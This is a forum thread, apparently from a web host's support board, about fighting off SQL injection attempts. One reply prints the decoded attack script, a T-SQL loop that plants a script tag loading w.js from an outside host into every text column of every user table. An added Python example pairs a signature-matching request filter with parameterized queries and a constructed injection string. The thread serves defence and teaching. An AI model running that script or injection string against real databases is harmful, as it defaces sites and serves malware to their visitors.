I have received a few attempts of SQL injection attacks on my site. As far as I am aware they were unsuccessful, but is there anything I can do to stop the attacks from happening in the first place? The querystring is very long and looks like this:
Joe Stagner has been covering this. On this page you can find a free tool that will evaluate your code: http://www.misfitgeek.com/Tools+To+Block+And+Eradicate+SQL+Injection.aspx
This posting describes the attack in detail: http://isc.sans.org/diary.html?storyid=4565 Bruce DiscountASP.NET www.DiscountASP.NET
wisemx, thanks for pointing to the free tools. Bruce, thanks for the link to the explanation of the attack. I hadn't found that myself. It's always interesting to know. One of the tools recommended by Joe Stagner is UrlScan. Can I use that tool on discountasp?
Hi, I decoded your script: DECLARE @S CHAR(4000);SET @S=DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']='''></title><script src='http://www0.douhunqn.cn/csrss/w.js'></script><!--''+['+@C+'] where '+@C+' not like ''%'></title><script src='http://www0.douhunqn.cn/csrss/w.js'></script><!--''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor AS CHAR(4000));EXEC(@S); I resolved this type of attack by ending any request that contains a specified string, e.g. DECLARE @S CHAR(4000);, in the BeginRequest event. Alexei Cioina. My Web Site: www.californiadreamhomesandland.com/Pages/ReportExplorer.aspx?ItmPath_25B7ED104E83=/English/Web%20Master/Web%20Site%20Statistics
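An added example, not code from this thread or from DiscountASP.NET, showing the two layers the posts above touch on: a request filter in the spirit of the BeginRequest check (it URL-decodes the query string and looks for the DECLARE @S CHAR(4000) signature from the decoded script), beside the fix that removes the bug itself, parameterized queries. sqlite3 stands in for SQL Server so the example runs offline; the hex-literal CAST encoding it expands is an assumption about how the script arrived encoded, and every input below (table, rows, query strings, payload) is constructed for the example.

```python
"""Added example, not code from the thread: a signature filter in the spirit
of the BeginRequest check, next to parameterized queries, which fix the bug
itself. sqlite3 stands in for SQL Server; all inputs here are constructed."""
import re
import sqlite3
from urllib.parse import unquote_plus

# Signature taken from the decoded payload quoted in the thread. Blocking on it
# is a stop-gap: a re-encoded or reworded payload slips past it.
SIGNATURE = re.compile(r"DECLARE\s+@S\s+CHAR\(4000\)", re.IGNORECASE)

# The thread says the script arrived encoded. Hex-literal CAST(0x... AS ...) is
# an ASSUMED encoding for this example, not something quoted on the page.
HEX_CAST = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s+N?(?:VAR)?CHAR", re.IGNORECASE)


def normalize(query_string: str) -> str:
    """URL-decode and expand hex literals so the signature check sees roughly
    the text the database engine would execute, not the transport encoding."""
    text = unquote_plus(query_string)

    def expand(match: re.Match) -> str:
        raw = bytes.fromhex(match.group(1))
        # ASCII text stored as UTF-16LE has a NUL after every byte; dropping
        # NULs recovers it and leaves plain single-byte text unchanged.
        return raw.decode("latin-1").replace("\x00", "")

    return HEX_CAST.sub(expand, text)


def looks_like_injection(query_string: str) -> bool:
    """True when the normalized query string carries the worm's signature."""
    return SIGNATURE.search(normalize(query_string)) is not None


def demo_db() -> sqlite3.Connection:
    """In-memory table with two rows, standing in for a site's content table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO items VALUES (?, ?)", [(1, "widget"), (2, "gadget")])
    conn.commit()
    return conn


def unsafe_rename(conn: sqlite3.Connection, item_id: int, new_name: str) -> list:
    """Concatenates user input into SQL. executescript runs batched statements,
    which is the same property the thread's payload relies on in SQL Server."""
    conn.executescript(f"UPDATE items SET name = '{new_name}' WHERE id = {item_id};")
    return [row[0] for row in conn.execute("SELECT name FROM items ORDER BY id")]


def safe_rename(conn: sqlite3.Connection, item_id: int, new_name: str) -> list:
    """Parameterized: new_name is bound as a value and can never become SQL."""
    conn.execute("UPDATE items SET name = ? WHERE id = ?", (new_name, item_id))
    return [row[0] for row in conn.execute("SELECT name FROM items ORDER BY id")]


# Constructed input that closes the quoted string and appends a statement.
PAYLOAD = "x'; UPDATE items SET name = 'defaced' --"

if __name__ == "__main__":
    print(looks_like_injection("id=1&x=DECLARE%20@S%20CHAR(4000);"))  # True
    print(unsafe_rename(demo_db(), 1, PAYLOAD))  # every row rewritten
    print(safe_rename(demo_db(), 1, PAYLOAD))    # payload stored as text in row 1
```

The filter only narrows the window in which a known worm variant gets through; the parameterized version is what makes the injected text inert, so even a payload the filter never saw ends up stored as a harmless string rather than executed.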
You cannot mess w/ the URLScan rule on IIS6 on a per-site basis. You can, however, do this on IIS7. Bruce DiscountASP.NET www.DiscountASP.NET